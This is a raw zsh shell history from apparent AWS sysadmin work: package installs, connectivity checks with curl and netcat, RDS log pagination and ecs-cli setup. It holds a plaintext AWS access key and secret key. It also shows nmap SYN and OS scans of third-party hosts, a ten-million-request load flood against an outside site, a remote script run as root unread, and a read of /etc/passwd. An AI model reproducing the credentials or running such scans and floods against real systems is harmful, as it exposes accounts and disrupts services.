: 1453182710:0;nano .zpreztorc
: 1453183385:0;sudo nano /etc/sysconfig/network
: 1453183524:0;chsh -s /bin/zsh
: 1453183564:0;less .bash_history
: 1453183582:0;ll 
: 1453183601:0;rm epel-release-*
: 1453183624:0;sudo yum install nmap ncdu
: 1453183637:0;sudo yum install nmap ncdu htop ntop iftop
: 1453183661:0;sudo yum install tcpdump.x86_64
: 1453183682:0;sudo yum install mtr
: 1453183708:0;sudo yum install vim
: 1453183727:0;sudo yum install python2 python3
: 1453183741:0;sudo yum install python27 python3
: 1453183769:0;_nmap
: 1453183779:0;nmap
: 1453183837:0;sudo yum install screen
: 1453183938:0;mv ec2-anupam-iad.pem .ssh
: 1453184036:0;scp .zpreztorc redhat:~
: 1453184044:0;scp .zshrc redhat:~
: 1453184561:0;scp .zpreztorc .zshrc ubuntu:~
: 1453184783:0;pip install --user git+git://github.com/powerline/powerline
: 1453184878:0;pip install --user powerline-status
: 1453184919:0;nano .vimrc
: 1453184980:0;vim
: 1453185317:0;less .vimrc
: 1453185567:0;scp .vimrc ubuntu:~
: 1453185922:0;pip install saws
: 1453185927:0;sudo pip install saws
: 1453185976:0;sudo pip install awscli
: 1453215976:0;nc -vvvvv  80
: 1453215984:0;nc -vvvvv 52.4.100.68 80
: 1453216016:0;curl -IvkL 52.4.100.68 
: 1453216415:0;curl -IvkL www.gfkboutique.com
: 1453216562:0;curl www.cannykart.com
: 1453216706:0;curl -IvKL www.cannykart.com
: 1453216719:0;curl -IvkL www.cannykart.com
: 1453217219:0;curl -IvkL 52.11.215.218
: 1453226129:0;who
: 1453230241:0;cd /etc/udev/rules.d
: 1453233016:0;sudo sudo nmap -sS -O -Pn -p80 ws.flipkey.com
: 1453233146:0;sudo nmap -sS -O -Pn -p80 ws.flipkey.com
: 1453305291:0;less ubuntu
: 1453325256:0;vim .bash_logout
: 1453395565:0;md5sum .ssh/ec2-anupam-iad.pem
: 1453473119:0;curl -IvkL 54.77.199.84
: 1453473153:0;curl www.dogworld.co.uk
: 1453473164:0;curl -IvkL  www.dogworld.co.uk
: 1453823672:0;wget https://s3-external-1.amazonaws.com/cloudformation-templates-us-east-1/CloudFormer.template
: 1453825156:0;curl -IvkL staging.uphail.com
: 1453827112:0;curl -lv staging.uphail.com
: 1453827314:0;curl -lv https://uphail.com
: 1453827405:0;curl -lv https://www.uphail.com
: 1453827429:0;curl -lvk https://www.uphail.com
: 1453827558:0;curl -lvk https://uphail.com
: 1453828075:0;curl -lvk https://staging.uphail.com
: 1453832219:0;watch -n 1 'curl -lvk https://staging.uphail.com'
: 1453833989:0;nc -vvvvv 54.172.254.182  22
: 1453840442:0;curl -Ivk http://uphail.com
: 1453840451:0;curl -Ivk https://uphail.com
: 1453840462:0;curl -IvkL https://uphail.com
: 1453840473:0;curl -IvkL http://google.com
: 1453840506:0;curl -IvkL http://facebook.com
: 1453848600:0;curl 
: 1453848606:0;wget
: 1453848621:0;wget http://crl.sca1b.amazontrust.com/sca1b.crl
: 1453848689:0;openssl crl -inform DER -text -in sca1b.crl
: 1453913781:0;yum search syspref
: 1453933443:0;sudo yum update -y
: 1453933451:0;sudo yum groupinstall -y "Development Tools"
: 1453933498:0;sudo sudo yum groupinstall "Development Tools"
: 1453933516:0;sudo yum groups mark install
: 1453933533:0;sudo sudo yum mark install  "Development Tools"
: 1453933839:0;sudo yum install -y \\
: 1454011993:0;        ncurses-devel ruby bzip2-devel expat-develsudo yum install -y \\
: 1454011993:0;        autoconf automake19 libtool gettext \\
: 1454011993:0;        git scons cmake flex bison \\
: 1454011993:0;        libcurl-devel curl \\
: 1454011993:0;        ncurses-devel ruby bzip2-devel expat-devel
: 1453933862:0;git clone https://github.com/Homebrew/linuxbrew.git ~/.linuxbrew
: 1453933954:0;which brew
: 1453933962:0;echo $PKG_CONFIG_PATH
: 1453933985:0;brew search zsh
: 1453933994:0;brew info zsh
: 1454005584:0;yum install zlib-devel
: 1454005588:0;sudo yum install zlib-devel
: 1454005594:0;brew install zsh
: 1454005920:0;vim .zshrc
: 1454012009:0;$ZSH_VERSION
: 1454012079:0;which zsh
: 1454012089:0;chsh -s ~/.linuxbrew/bin/zsh
: 1454017479:0;curl -Ivk https://s3.amazonaws.com/swiptetospin-viewers/dev-test/more_spins.json
: 1454017502:0;curl -Ivk https://s3.amazonaws.com/swipetospin-viewers/dev-test/more_spins.json
: 1454017531:0;watch -n 1 'curl -Ivk https://s3.amazonaws.com/swipetospin-viewers/dev-test/more_spins.json'
: 1454017548:0;watch -n 0.00001 'curl -Ivk https://s3.amazonaws.com/swipetospin-viewers/dev-test/more_spins.json'
: 1454018240:0;ping test-collin-internal3.spincar.com
: 1454178100:0;aws
: 1454178106:0;pip install awscli
: 1454342381:0;curl -IvkL iportmedia.com
: 1454346662:0;curl www.magzter.com
: 1454346671:0;curl -IvKl www.magzter.com
: 1454349313:0;sudo yum install httpd
: 1454350258:0;less /etc/httpd/conf/httpd.conf
: 1454350960:0;+
: 1454352410:0;nslookup 54.240.148.12
: 1454352569:0;nslookup 27.251.182.146
: 1454352681:0;nslookup 66.249.71.194
: 1454355113:0;nslookup 175.41.148.112
: 1454355158:0;nslookup 204.246.166.130
: 1454355760:0;curl -IvkL magzter.com
: 1454355808:0;curl -IvkL 175.41.148.112
: 1454357363:0;curl -IvkL 175.41.148.132
: 1454358271:0;nslookup 204.26.166.30
: 1454358284:0;nslookup 204.246.166.30
: 1454358446:0;nslookup 124.123.216.36
: 1454434502:0;less sca1b.crl
: 1454445366:0;curl -IvkL 52.35.102.26 
: 1454518549:0;curl -IvkL  54.171.54.110 
: 1454540806:0;nc -vvvv 54.145.229.26
: 1454540811:0;nc -vvvv 54.145.229.26 22
: 1454540857:0;nc -vvvv 54.145.229.26 80
: 1454540897:0;yum install -y nmap
: 1454540900:0;sudo yum install -y nmap
: 1454540914:0;sudo nmap -Pn 
: 1454540925:0;sudo nmap -Pn 54.145.229.26
: 1454697396:0;diskfree
: 1454697404:0;du 
: 1454734628:0;vim .vimrc
: 1454743245:0;less .ssh/authorized_keys
: 1454972522:0;nc -vvvv 0~414 502 84511~ 80
: 1454972544:0;nc -vvvv 52.90.35.181 80
: 1454972573:0;curl -Iv 52.90.35.181 
: 1454972725:0;nc -vvvvv mysqlmetric1.cm9m7gb5flnj.us-east-1.rds.amazonaws.com 3306
: 1454978018:0;less .ssh/ec2-anupam-iad.pem
: 1454983477:0;hup
: 1454995369:0;ping pi
: 1454995376:0;ping pi.verizon.net
: 1455028559:0;ping go.erplain.com
: 1455028580:0;curl -IvkL 54.210.226.141
: 1455029055:0;ping http://go.erplain.com
: 1455029065:0;curl -IvkL http://go.erplain.com
: 1455030590:0;curl -IvkL http://52.20.145.247/mautic/index.php/s/dashboard
: 1455030597:0;curl -IvkL http://52.20.145.247/mautic/index.php
: 1455030965:0;ls -arl
: 1455030972:0;ls -arl .z*
: 1455030983:0;ls -arhl .z*
: 1455054854:0;compdef
: 1455054891:0;curl -IvkL http://52.20.145.247
: 1455054896:0;curl -IvkL http://52.20.145.247/mautic/
: 1455114076:0;sar -A
: 1455205672:0;curl -IvkL 52.90.22.125 
: 1455206722:0;sudo yum install curl-devel
: 1455207408:0;ping 8.8.8.8
: 1455207482:0;curl -IvKL google.com
: 1455207489:0;curl -IvkL google.com
: 1455207499:0;curl -IvkL amazon.com
: 1455208575:0;wget https://raw.githubusercontent.com/AlperSakarya/LinuxUserWizard/master/linux-user-wizard.sh
: 1455208585:0;sudo bash linux-user-wizard.sh
: 1455212650:0;less linux-user-wizard.sh
: 1455213375:0;curl -IvkL 52.73.151.202
: 1455214246:0;less .ssh/config
: 1455289019:0;nc -vvvv 107.20.194.174 
: 1455289022:0;nc -vvvv 107.20.194.174 22
: 1455303495:0;ps ax
: 1455303501:0;ps aux
: 1455304203:0;curl -IvkL http://kimsflorist.com/
: 1455305585:0;curl -IvkL http://kimsflorist.com/\
: 1455305588:0;curl -IvkL http://kimsflorist.com/
: 1455305594:0;curl -IvkL http://kimsflorist.com/\
: 1455305595:0;curl -IvkL http://kimsflorist.com/
: 1455567870:0;usrgrp
: 1455568179:0;cat /etc/passwd
: 1455568287:0;pzupdate
: 1455569799:0;pod install
: 1455633197:0;yum search multilib
: 1455633270:0;dig +x newproj.propertyfinder.ae
: 1455633278:0;dig  newproj.propertyfinder.ae
: 1455633299:0;watch -n 1 'dig  newproj.propertyfinder.ae'
: 1455644864:0;pip install --upgrade awsebcli 
: 1455644886:0;sudo 'pip install --upgrade awsebcli'
: 1455644948:0;sudo pip install --upgrade awsebcli
: 1455644971:0;sudo su -
: 1455644988:0;sudo /bin/bash 
: 1455660716:0;y
: 1455660944:0;yum list all libgcc
: 1455660948:0;sudo yum list all libgcc
: 1455662151:0;sudo yum list all lib
: 1455662154:0;sudo yum list all lib*
: 1455662161:0;sudo yum search
: 1455662165:0;sudo yum search lib
: 1455662169:0;sudo yum search lib32
: 1455662187:0;sudo yum search lib32 | grep i686
: 1455662191:0;sudo yum search lib | grep i686
: 1455662203:0;yum install xmlrpc-c-c++.i686
: 1455662209:0;sudo yum install xmlrpc-c-c++.i686
: 1455662518:0;sudo yum install xmlrpc-c-c++.x86_64
: 1455663215:0;curl -IvkL rhui2-cds01.us-east-1.aws.ce.redhat.com
: 1455717391:0;pip install --upgrade awsebcli
: 1455717429:0;yum purge PyYAML
: 1455717462:0;yum uninstall pyyaml
: 1455717472:0;yum remove pyyaml
: 1455717475:0;sudo yum remove pyyaml
: 1455717500:0;eb init
: 1455719090:0;nc --version
: 1455719093:0;nc --v
: 1455719095:0;nc -v
: 1455744993:0;nc -vvvvv  52.0.249.218 22
: 1455745012:0;mtr  52.0.249.218
: 1455745016:0;sudo mtr  52.0.249.218
: 1455745294:0;cat /proc/sys/net/ipv4/ip_no_pmtu_disc
: 1455745416:0;sudo tcpdump dst https://rhui2-cds01.us-east-1.aws.ce.redhat.com/pulp/mirror/content/dist/rhel/rhui/server/7/7Server/x86_64/extras/os 
: 1455745428:0;sudo tcpdump dst rhui2-cds01.us-east-1.aws.ce.redhat.com/pulp/mirror/content/dist/rhel/rhui/server/7/7Server/x86_64/extras/os 
: 1455745445:0;sudo tcpdump dst rhui2-cds01.us-east-1.aws.ce.redhat.com
: 1455745570:0;sudo tcpdump '(port http or https)'
: 1455745610:0;sudo tcpdump '(port http or port https)'
: 1455745717:0;sudo tcpdump 
: 1455745837:0;sudo tcpdump dst 174.129.20.92
: 1455745934:0;curl -IvkL https://rhui2-cds01.us-east-1.aws.ce.redhat.com/pulp/mirror/rhui-client-config/rhel/server/7/x86_64/os
: 1455745991:0;sudo tcpdump | grep rhui
: 1455810104:0;free -m
: 1455816597:0;yum install bom
: 1455816601:0;yum install golang
: 1455816607:0;sudo yum install golang
: 1455816661:0;go
: 1455816711:0;mkdir boom
: 1455816715:0;cd boom
: 1455816723:0;export GOPATH=$HOME/boom
: 1455816728:0;go get github.com/rakyll/boom
: 1455816843:0;./boom -n 10000000 -c 25000 https://austinevick.com
: 1455817201:0;sysctl net.ipv4.netfilter.ip_conntrack_max
: 1455817206:0;sudo sysctl net.ipv4.netfilter.ip_conntrack_max
: 1455817222:0;wc -l /proc/net/ip_conntrack
: 1455817368:0;./boom -n 10000000 -c 12000 https://austinevick.com/login.php
: 1455817380:0;ll pa
: 1455817407:0;pkill boom
: 1455817507:0;./boom -n 10000000 -c 12000   -disable-keepalive -allow-insecure   https://austinevick.com/login.php
: 1455817819:0;cd boom/bin
: 1455817841:0;./boom -n 10000000 -c 12000   -disable-keepalive -allow-insecure -cpus 39  https://austinevick.com/login.php
: 1455818081:0;aws configure --profile gameday
: 1455818123:0;eb health webapp-dev --profile gameday
: 1455822834:0;nslookup austinevik.vom
: 1455822837:0;nslookup austinevik.com
: 1455822842:0;nslookup austinevick.com
: 1455823035:0;time
: 1455823385:0;./boom -n 10000000 -c 12000   -disable-keepalive -allow-insecure -cpus 39  https://austinevick.com/session.php
: 1455824280:0;pip install glances
: 1455824288:0;sudo pip install glances
: 1455824303:0;sudo /usr/local/bin/pip install glances
: 1455824313:0;sudo glan ces
: 1455824317:0;sudo glances
: 1455824325:0;glances
: 1455824707:0;sudo htop
: 1455824931:0;boom/bin
: 1455824941:0;watch -n 1 './boom -n 10000000 -c 12000   -disable-keepalive -allow-insecure -cpus 39  https://austinevick.com/session.php'
: 1455825619:0;sudo poweroff
: 1455893214:0;reload
: 1455893765:0;nano hello.py
: 1455893842:0;pip install Flask
: 1455893871:0;/usr/local/bin/pip install Flask
: 1455893893:0;sudo /usr/local/bin/pip install Flask
: 1455893921:0;sudo /usr/local/bin/pip pip install --upgrade pip
: 1455893958:0;vim hello.py
: 1455893965:0;py hello.py
: 1455893976:0;cd boom/
: 1455893981:0;bin
: 1455894038:0;./boom -n 10000 -c 1200   -disable-keepalive -allow-insecure -cpus 39 http://127.0.0.1:5000
: 1455894113:0;./boom -n 100000 -c 1200   -disable-keepalive -allow-insecure -cpus 39 http://127.0.0.1:5000
: 1455894184:0;cat /proc/sys/fs/file-max
: 1455894225:0;ulimit
: 1455894231:0;ulimit -u
: 1455894237:0;ulimit -help
: 1455894240:0;ulimit -h
: 1455894242:0;ulimit 
: 1455894246:0;ulimit -v
: 1455895308:0;less  ~/.zpreztorc
: 1455897417:0;yum search lib
: 1455899404:0;nc -vvvvvv 52.32.27.122 22
: 1455899409:0;nc -vvvvvv 52.32.27.122 80
: 1455899466:0;nc -vvvvvv 52.32.27.122 443
: 1455899544:0;curl -IvkL https://52.32.27.122:443
: 1455899546:0;curl -IvkL https://52.32.27.122
: 1456158703:0;env
: 1456162006:0;wget 
: 1456162017:0;wget https://raw.githubusercontent.com/client9/sslassert/master/openssl-ciphers.sh
: 1456162035:0;sh openssl-ciphers.sh
: 1456162050:0;sh openssl-ciphers.sh google.com
: 1456162281:0;nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995 d3ngi10tapsh0s.cloudfront.net
: 1456162417:0;nano ciphers.sh
: 1456162453:0;sh ciphers.sh d3ngi10tapsh0s.cloudfront.net
: 1456162475:0;sh ciphers.sh d3ngi10tapsh0s.cloudfront.net:443
: 1456162643:0;nano out
: 1456162655:0;cat out | grep yes
: 1456162659:0;cat out | grep YES
: 1456174463:0;nano ciphers.sh 
: 1456174475:0;sh ciphers.sh d3ngi10tapsh0s.cloudfront.net | grep YES
: 1456174480:0;sh ciphers.sh google.com:443 | grep YES
: 1456174499:0;sh ciphers.sh amazon.com:443 | grep YES
: 1456174512:0;sh ciphers.sh ae.com:443 | grep YES
: 1456174551:0;sh ciphers.sh ar.com:443 | grep YES
: 1456174578:0;jwhois https://ar.com/
: 1456174597:0;sudo yum install jwhois
: 1456174603:0;jwhois ar.com
: 1456175770:0;less
: 1456198460:0;curl -IvkL http://localtest.me/
: 1456200852:0;sudo sudo yum update
: 1456204689:0;cat .zpreztorc
: 1456204769:0;cat .zshrc 
: 1456237135:0;nc -vvvvv 23.21.185.7 80
: 1456237937:0;cd /etc/yum.repos.d/
: 1456238594:0;rpm -qa clamav 
: 1456238601:0;yum install clamav
: 1456238624:0;yum install -y epel-release # yum install -y clamav
: 1456238629:0;yum install -y epel-release
: 1456238633:0;sudo yum install -y epel-release
: 1456238657:0;sudo vim /etc/yum.repos.d/epel.repo
: 1456238698:0;sudo yum install clanav clamav-update
: 1456238714:0;sudo yum install clamav
: 1456238727:0;find / 
: 1456238743:0;sudo find / -name clam
: 1456238765:0;rpm -qa clam
: 1456238768:0;rpm -qa clamav
: 1456238810:0;rpm -qpl | rpm -qa clamav
: 1456238821:0;rpm -qpl `rpm -qa clamav`
: 1456238834:0;rpm -qpl clamav-0.98.7-1.12.amzn1.x86_64
: 1456238919:0;sudo /usr/bin/clamscan
: 1456238939:0;sudo /usr/bin/clamscan update
: 1456238991:0;sudo /usr/bin/clamupdate
: 1456239001:0;rpm -ql clamav-0.98.7-1.12.amzn1.x86_64
: 1456239351:0;ls -al /etc/freshclam.conf
: 1456239370:0;sudo chmod 666 /etc/freshclam.conf
: 1456239377:0;rpm -ql clamav-update
: 1456239387:0;/usr/bin/freshclam
: 1456239452:0;cat /etc/freshclam.conf
: 1456239614:0;cp /etc/freshclam.conf /etc/freshclam.conf.orig
: 1456239620:0;sudo cp /etc/freshclam.conf /etc/freshclam.conf.orig
: 1456252020:0;wget -NP /var/lib/pgsql94/data https://s3-eu-west-1.amazonaws.com/platforms-teamcity/config/postgres/server.crt
: 1456252256:0;rpm -qa glibc
: 1456252265:0;rpm -qa wget
: 1456252526:0;wget --versbose
: 1456252530:0;wget --help
: 1456252558:0;wget -d google.com
: 1456252657:0;rm index.html*
: 1456263814:0;pvs
: 1456263819:0;sudo pvs
: 1456268740:0;yum info wget
: 1456268759:0;wget -h
: 1456268798:0;wget -V
: 1456269019:0;sudo strace wget -NP https://s3-eu-west-1.amazonaws.com/platforms-teamcity/config/postgres/server.crt
: 1456269074:0;strace wget -NP ~/data https://s3-eu-west-1.amazonaws.com/platforms-teamcity/config/postgres/server.crt
: 1456325100:0;curl -IvkL  52.36.58.184
: 1456325135:0;curl -IvkL  52.36.58.184:443
: 1456325405:0;nslookup www.gttoner.com
: 1456325574:0;curl -IvkL  52.36.58.184:80
: 1456325604:0;nc -vvvv 52.36.58.184 80
: 1456325924:0;nc -vvvv 52.36.58.184/index.html 80
: 1456325936:0;curl -IvkL  52.36.58.184:80/index11.html
: 1456338879:0;yum whatprovides '*bin/grep'
: 1456338896:0;sudo yum whatprovides '*lzma*'
: 1456339681:0;sudo yum whatprovides '*lzma*' | grep '*liblzma.so.5'
: 1456340055:0;sudo yum whatprovides '*lzma*' | grep '*liblzma.so.*'
: 1456340130:0;sudo yum whatprovides '*lzma*' | grep '*liblzma.so.0'
: 1456340142:0;sudo yum whatprovides '*lzma*' 
: 1456415111:0;sudo ntpdate -S pool.ntp.org
: 1456415116:0;sudo ntpdate - pool.ntp.org
: 1456415120:0;sudo ntpdate s pool.ntp.org
: 1456415124:0;sudo ntpdate  pool.ntp.org
: 1456425646:0;curl -IvkL http://www.verisk.com/
: 1456435271:0;curl -IvkL http://52.9.72.115
: 1456436559:0;nc -vvvvv 54.193.122.42 22
: 1456436578:0;nc -vvvv localhost 22
: 1456437344:0;ssh -i .ssh/ec2-anupam-iad.pem root@54.175.227.106
: 1456438813:0;nc -vvvvv 52.9.121.112 22
: 1456512017:0;sudo pip
: 1456512026:0;pip
: 1456512051:0;sudo /usr/local/bin/pip
: 1456518539:0;man initrd
: 1456778241:0;curl -IvkL https://creska.com/
: 1456781533:0;curl -IvkL 54.172.168.35
: 1456782027:0;nc -vvvvv 52.90.135.96 222
: 1456782030:0;nc -vvvvv 52.90.135.96 22
: 1456782922:0;dig p4g.io
: 1456782963:0;watch -n 0.1 'dig p4g.io'
: 1456782989:0;watch -n 0.00001 'dig p4g.io'
: 1456784491:0;dig smtp.server.net
: 1456784521:0;dig +trace smtp.server.net
: 1456784595:0;whois google.com
: 1456785928:0;pkill
: 1456856761:0;curl -IvkL 52.72.98.154 
: 1456862804:0;whois aws.com
: 1456862845:0;whois bws.com
: 1456862855:0;whois cws.com
: 1456862864:0;whois ews.com
: 1456862875:0;whois sdcasdv.com
: 1456862953:0;whois amazon.com
: 1456863508:0;whois sdv.com
: 1456863522:0;whois abc.xyz
: 1456868813:0;nc -vvvv 52.73.151.202
: 1456868815:0;nc -vvvv 52.73.151.202 22
: 1456958623:0;yum search awscli
: 1456958629:0;sudo yum search awscli
: 1456958634:0;sudo yum search aws-cli
: 1456958657:0;sudo yum --showduplicates list aws-cli
: 1456958811:0;pip install -I awscli==1.10.8
: 1456958836:0;sudo pip install -I awscli==1.10.8
: 1456958851:0;sudo /usr/local/bin/pip install -I awscli==1.10.8
: 1456958868:0;sudo `which pip`
: 1456958917:0;aws configure
: 1456958951:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token 0 --output text
: 1456958956:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token 1 --output text
: 1456958963:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --output text
: 1456959020:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token 0 --page-size 1024 --output text
: 1456959029:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token 0 --page-size 1024
: 1456959125:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token None --page-size 1024
: 1456959133:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token "0" --page-size 1024
: 1456959139:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token  --page-size 1024
: 1456959149:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21 --starting-token "0" --page-size 102400
: 1456959156:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 102400
: 1456959165:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10240000
: 1456959565:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10  --max-items 10
: 1456959580:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10  --max-items 100
: 1456959600:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10  
: 1456959619:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10  --max-items 
: 1456959636:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 3
: 1456959652:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 1024
: 1456959899:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 1
: 1456959906:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 10  --max-items 1
: 1456959934:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 2  --max-items 1
: 1456959944:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 2  --max-items 
: 1456959946:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-21  --page-size 2  --max-items 2
: 1456960085:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 2  --max-items 2
: 1456960091:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 1
: 1456960094:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 2
: 1456960122:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 80
: 1456960137:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 20
: 1456960143:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 10
: 1456960176:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 100 | grep -i log | wc -l
: 1456960188:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 100 | grep -i utc | wc -l
: 1456960197:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 10 | grep -i utc | wc -l
: 1456960219:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 20 | grep -i utc | wc -l
: 1456960226:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 24 | grep -i utc | wc -l
: 1456960232:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-02-22  --page-size 30 | grep -i utc | wc -l
: 1456960564:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.*  --page-size 30 | grep -i utc | wc -l
: 1456960571:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.  --page-size 30 | grep -i utc | wc -l
: 1456960578:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log  --page-size 30 | grep -i utc | wc -l
: 1456960693:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgres.log  --page-size 30 | grep -i utc | wc -l
: 1457031719:0;pip install ecs-cli
: 1457031723:0;pip install ecscli
: 1457031748:0;sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-latest
: 1457031762:0;ecs-cli help
: 1457031956:0;ecs-cli configure
: 1457031964:0;ecs-cli --help
: 1457032059:0;ecs-cli configure --region us-west-2 --access-key AKIAJHTUY546AWLRHLGQ --secret-key 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 --cluster ecs-cli-demo
: 1457032075:0;ecs-cli compose service up --help
: 1457032098:0;ecs-cli up --keypair id_rsa --capability-iam --size 2 --instance-type t2.medium
: 1457032163:0;ecs-cli up --keypair ec2-anupam --capability-iam --size 2 --instance-type t2.medium
: 1457032260:0;ecs-cli up --keypair ec2-anupam --capability-iam --size 9 --instance-type t2.medium
: 1457032571:0;wordpress:
: 1457032571:0;mysql:
: 1457032595:0;vim hello-world.yaml 
: 1457032625:0;ecs-cli compose --file hello-world.yml up
: 1457032632:0;ecs-cli compose --file hello-world.yaml up
: 1457033002:0;nslookup 52.37.147.1
: 1457033248:0;ecs-cli ps
: 1457036143:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgres.log  --page-size 30
: 1457036204:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19  --page-size 30
: 1457036223:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19  --page-size 30 | grep -i utc | wc -l
: 1457036326:0;history | grep postgr
: 1457036389:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19  --page-size 30 --output text
: 1457036398:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19  --page-size 30 --output text | wc -l 
: 1457036426:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19 --starting-token 0 --page-size 30 --output text | wc -l 
: 1457036479:0;less -n /usr/local/lib/python2.7/site-packages/botocore/paginate.py
: 1457036486:0;man less
: 1457037143:0;less -N /usr/local/lib/python2.7/site-packages/botocore/paginate.py
: 1457038760:0;ecs-cli down --force
: 1457043139:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19 --starting-token 0 --page-size 30 --output text --debug
: 1457043149:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19 --starting-token 0 --page-size 30 --output text 
: 1457043158:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-19  --page-size 30 --output text 
: 1457043287:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-25  --page-size 30 --output text 
: 1457043309:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text 
: 1457043322:0;`aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text`
: 1457043336:0;'aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text'
: 1457043388:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text > 2016-03-03-21
: 1457043398:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-22  --page-size 30 --output text > 2016-03-03-22
: 1457043411:0;diff 2016-03-03-21 2016-03-03-22
: 1457043475:0;cat 2016-03-03-21 2016-03-03-22
: 1457043672:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-22  --page-size 30 --output text 
: 1457043679:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-22  --page-size 30 --output text  | wc -l
: 1457043686:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  | wc -l
: 1457043700:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --max-items 20
: 1457043731:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --next-token eyJNYXJrZXIiOiBudWxsLCAiYm90b190cnVuY2F0ZV9hbW91bnQiOiAyMH0=  --max-items 20
